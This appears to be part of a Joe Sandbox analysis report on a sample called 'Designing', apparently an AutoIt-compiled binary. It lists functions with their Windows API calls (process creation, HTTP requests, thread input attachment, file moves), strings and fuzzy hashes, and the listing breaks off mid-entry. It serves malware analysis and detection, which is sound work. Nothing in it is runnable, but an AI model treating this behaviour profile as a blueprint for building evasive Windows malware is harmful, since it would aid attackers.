                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: f01bb05818a5957437fe1704ba4e71f9428803c88bd951ce692664d63354e1ea
                                              • Instruction ID: e7ec0e8b384fc2bc751646ea91587ac24c69050e69634a8564d70ca2e9c74304
                                              • Opcode Fuzzy Hash: f01bb05818a5957437fe1704ba4e71f9428803c88bd951ce692664d63354e1ea
                                              • Instruction Fuzzy Hash: DB219075E00208ABDF00AFA4CC85EFEBBE9EB94300F1401A5B951972A1DB759955DB20
                                              Function 00B89D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32 ref: 00B89D27
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00B89D3C
                                              • _wcscmp.LIBCMT ref: 00B89D4E
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B89DC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: cf9c8fe7615d7e472f9ec846ecd57ec49b901abfb017d6e866bb38def5032f35
                                              • Instruction ID: 271c9b25101f59e81a16e426227f45792d86b5cce60877e1df3551c3934a53fe
                                              • Opcode Fuzzy Hash: cf9c8fe7615d7e472f9ec846ecd57ec49b901abfb017d6e866bb38def5032f35
                                              • Instruction Fuzzy Hash: 4911E376248302BAFA003621EC46EB673DCDB15BA5B2000F6FA10A51F1FFA56A119B59
                                              Function 00BA8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BA8FC1
                                              • CoInitialize.OLE32(00000000), ref: 00BA8FEE
                                              • CoUninitialize.OLE32 ref: 00BA8FF8
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00BA90F8
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BA9225
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BC3BDC), ref: 00BA9259
                                              • CoGetObject.OLE32(?,00000000,00BC3BDC,?), ref: 00BA927C
                                              • SetErrorMode.KERNEL32(00000000), ref: 00BA928F
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BA930F
                                              • VariantClear.OLEAUT32(?), ref: 00BA931F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: 87c420b811a35c07f90fb4bdc9e7e9f78c374ba95c24382910603865284915e1
                                              • Instruction ID: c5e936cf2b8b65efaf5fbc5f54bab6d5d567e1582fbeb7a003cee28a450f322b
                                              • Opcode Fuzzy Hash: 87c420b811a35c07f90fb4bdc9e7e9f78c374ba95c24382910603865284915e1
                                              • Instruction Fuzzy Hash: 23C11671608305AFD700EF68C884A2BB7E9FF89748F10499DF9899B251DB71ED05CB52
                                              Function 00B919CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00B919EF
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A03
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00B91A0A
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A19
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B91A2B
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A44
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A56
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A9B
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91AB0
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91ABB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: d63d94c438a88e4ea5684427fde3095af9da78f1b58f7200248148ed02d7afee
                                              • Instruction ID: 738454bb43e8766fbce0955149f02f592d0d5bd7dee9c83fa95951df310c874a
                                              • Opcode Fuzzy Hash: d63d94c438a88e4ea5684427fde3095af9da78f1b58f7200248148ed02d7afee
                                              • Instruction Fuzzy Hash: 9131BD71661205AFEF10AF28DC88FB977EAEB69315F1089A5F810C7190DFB49D40DB60
                                              Function 00B6C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00B3260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00B32617
                                              • SetBkMode.GDI32(?,00000001), ref: 00B3262C
                                              • GetStockObject.GDI32(00000005), ref: 00B32634
                                              • GetClientRect.USER32(?), ref: 00B6C0FC
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B6C113
                                              • GetWindowDC.USER32(?), ref: 00B6C11F
                                              • GetPixel.GDI32(00000000,?,?), ref: 00B6C12E
                                              • ReleaseDC.USER32(?,00000000), ref: 00B6C140
                                              • GetSysColor.USER32(00000005), ref: 00B6C15E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                              • String ID:
                                              • API String ID: 3430376129-0
                                              • Opcode ID: ae4d12df92c550db86989f9800645803f599a69f301146ef0c11f93f8625acae
                                              • Instruction ID: eb24365f560ccc5e8e0849bd072fa6da33a6306dae80833154360e0a70eda6d5
                                              • Opcode Fuzzy Hash: ae4d12df92c550db86989f9800645803f599a69f301146ef0c11f93f8625acae
                                              • Instruction Fuzzy Hash: 8E114C31510205FFDB616FA4EC49FA97BA1EF19322F2442A5FA65A60E1CF314A51EF10
                                              Function 00B3AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B3ADE1
                                              • OleUninitialize.OLE32(?,00000000), ref: 00B3AE80
                                              • UnregisterHotKey.USER32(?), ref: 00B3AFD7
                                              • DestroyWindow.USER32(?), ref: 00B72F64
                                              • FreeLibrary.KERNEL32(?), ref: 00B72FC9
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B72FF6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: 26daa8b8e549cedd97f4020477e594f9e653926cd2e0869956ce3560ce3d4ea3
                                              • Instruction ID: 0841e61dbfdc343e8ddc9185b4b053742b5028d955c00e93b0d217ce09d9df53
                                              • Opcode Fuzzy Hash: 26daa8b8e549cedd97f4020477e594f9e653926cd2e0869956ce3560ce3d4ea3
                                              • Instruction Fuzzy Hash: F2A13B707012128FCB29EF14C895B69F7E4EF04700F2482EDE85AAB251DB31AE56DF91
                                              Function 00B8AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnumChildWindows.USER32(?,00B8B13A), ref: 00B8B078
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: 247e511d71f9dddcda9a0f0d3f42b4a9653d4e9b879ebd0d205ecc696d0c7cf2
                                              • Instruction ID: 7cb2a6416431464fc81313ab051491d1755911f3608f49787023c72f2474971a
                                              • Opcode Fuzzy Hash: 247e511d71f9dddcda9a0f0d3f42b4a9653d4e9b879ebd0d205ecc696d0c7cf2
                                              • Instruction Fuzzy Hash: 59918071A00505EADB18FF60C481BEAFBF5FF04300F14859AE95AA72A1DF306999DB91
                                              Function 00B331F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00B3327E
                                                • Part of subcall function 00B3218F: GetClientRect.USER32(?,?), ref: 00B321B8
                                                • Part of subcall function 00B3218F: GetWindowRect.USER32(?,?), ref: 00B321F9
                                                • Part of subcall function 00B3218F: ScreenToClient.USER32(?,?), ref: 00B32221
                                              • GetDC.USER32 ref: 00B6D073
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B6D086
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B6D094
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B6D0A9
                                              • ReleaseDC.USER32(?,00000000), ref: 00B6D0B1
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B6D13C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: b642c0df1fc42f1d73c2c8b9a0aa2ceca812814b3ecc2048df733a45b3a41a25
                                              • Instruction ID: b87e1b64325076410db21c49047ac8efa4e5fae09fe0506628b2ba7210e5a50e
                                              • Opcode Fuzzy Hash: b642c0df1fc42f1d73c2c8b9a0aa2ceca812814b3ecc2048df733a45b3a41a25
                                              • Instruction Fuzzy Hash: DC71AD30A00205EFCF219F64CC94AAA7BF5FF49360F2442E9ED559B165CB358981DB60
                                              Function 00BBC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                                • Part of subcall function 00B32714: GetCursorPos.USER32(?), ref: 00B32727
                                                • Part of subcall function 00B32714: ScreenToClient.USER32(00BF77B0,?), ref: 00B32744
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000001), ref: 00B32769
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000002), ref: 00B32777
                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00BBC69C
                                              • ImageList_EndDrag.COMCTL32 ref: 00BBC6A2
                                              • ReleaseCapture.USER32 ref: 00BBC6A8
                                              • SetWindowTextW.USER32(?,00000000), ref: 00BBC752
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BBC765
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00BBC847
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                              • API String ID: 1924731296-2107944366
                                              • Opcode ID: 0dc741019134966c5b8de0b69e9170bb09cbd30864e1297a195989b0e6b8ee7c
                                              • Instruction ID: aa6234f98f259c39375f86817a499167c555f47112b0efa5e79ea967733396f4
                                              • Opcode Fuzzy Hash: 0dc741019134966c5b8de0b69e9170bb09cbd30864e1297a195989b0e6b8ee7c
                                              • Instruction Fuzzy Hash: 11516A71608204AFD700EF15CC59FBA7BE5EB88310F1049A9F9958B2A1CF70AD49CB62
                                              Function 00BA20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BA211C
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BA2148
                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BA218A
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BA219F
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA21AC
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BA21DC
                                              • InternetCloseHandle.WININET(00000000), ref: 00BA2223
                                                • Part of subcall function 00BA2B4F: GetLastError.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B64
                                                • Part of subcall function 00BA2B4F: SetEvent.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                              • String ID:
                                              • API String ID: 2603140658-3916222277
                                              • Opcode ID: 5f5413aef2579637426453b32e21f53da5ae312ceff34f9fb2910bbc04c8aa60
                                              • Instruction ID: 0a987301b6ce697a4ca4b4d1a56e185699eed2ece3bb656f9d93425aee75d87f
                                              • Opcode Fuzzy Hash: 5f5413aef2579637426453b32e21f53da5ae312ceff34f9fb2910bbc04c8aa60
                                              • Instruction Fuzzy Hash: 77418EB1508208BFEB169F54CC89FBB7BECEF09354F004196FA05AA141DB709E448BA0
                                              Function 00BA9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BC0980), ref: 00BA9412
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BC0980), ref: 00BA9446
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BA95C0
                                              • SysFreeString.OLEAUT32(?), ref: 00BA95EA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: dce572e1fb342a396c68f4a9394d4fd160f13f4a31afabd0811fdbba725aeb3c
                                              • Instruction ID: d089d3f910eead85c580d628543fe658871f0894ef98b5da6577b5fc490f7f7f
                                              • Opcode Fuzzy Hash: dce572e1fb342a396c68f4a9394d4fd160f13f4a31afabd0811fdbba725aeb3c
                                              • Instruction Fuzzy Hash: 5EF12C71A04209EFCF14DF94C884EAEB7B9FF4A314F148498F916AB251DB31AE45DB60
                                              Function 00BAFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BAFD9E
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFF31
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFF55
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFF95
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFFB7
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BB0133
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BB0165
                                              • CloseHandle.KERNEL32(?), ref: 00BB0194
                                              • CloseHandle.KERNEL32(?), ref: 00BB020B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: 1d8965933dcaf76f03ff7da577ae9542951fc74b4c1f596bbd971a7aacfba3d3
                                              • Instruction ID: 35345e49ba593f0e5fcdfa2ec32c2db6c491c806fd96b367eaaf82a80e3148dd
                                              • Opcode Fuzzy Hash: 1d8965933dcaf76f03ff7da577ae9542951fc74b4c1f596bbd971a7aacfba3d3
                                              • Instruction Fuzzy Hash: 71E181316083419FC715EF24C891B7ABBE1EF85314F1485ADF8899B2A2CB71EC45CB52
                                              Function 00B9527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B93B8A,?), ref: 00B94BE0
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B93B8A,?), ref: 00B94BF9
                                                • Part of subcall function 00B94FEC: GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00B952FB
                                              • _wcscmp.LIBCMT ref: 00B95315
                                              • MoveFileW.KERNEL32(?,?), ref: 00B95330
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: fb5dcaf38b4e39b57e6845f3105b4cac4236916c3fadc78c50e3c21ddbd92131
                                              • Instruction ID: 1c2129ebf65b918239f931cb4a132e743d62b7eb2a536868d39554459b01f25e
                                              • Opcode Fuzzy Hash: fb5dcaf38b4e39b57e6845f3105b4cac4236916c3fadc78c50e3c21ddbd92131
                                              • Instruction Fuzzy Hash: 0F5185B24083859BCB75DB64DC81EDBB3ECDF84301F00496EB589D3152EF34A6888766
                                              Function 00BB8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BB8D24
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: a6b8c2f733f8135165ace184d5c73d1d6ad26599e2185dd4d55e7ebbc608d4a1
                                              • Instruction ID: 7d25c420bc374078c237666a53e5ae081a39061e51c6735fd8dd3e07dc4b5429
                                              • Opcode Fuzzy Hash: a6b8c2f733f8135165ace184d5c73d1d6ad26599e2185dd4d55e7ebbc608d4a1
                                              • Instruction Fuzzy Hash: C6517E70640204BFEB249F28DC85BF97BE8EB05350F2445A6F514E71E1CFB1E950DA50
                                              Function 00B32F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                              Download Yara Rule
                                              APIs
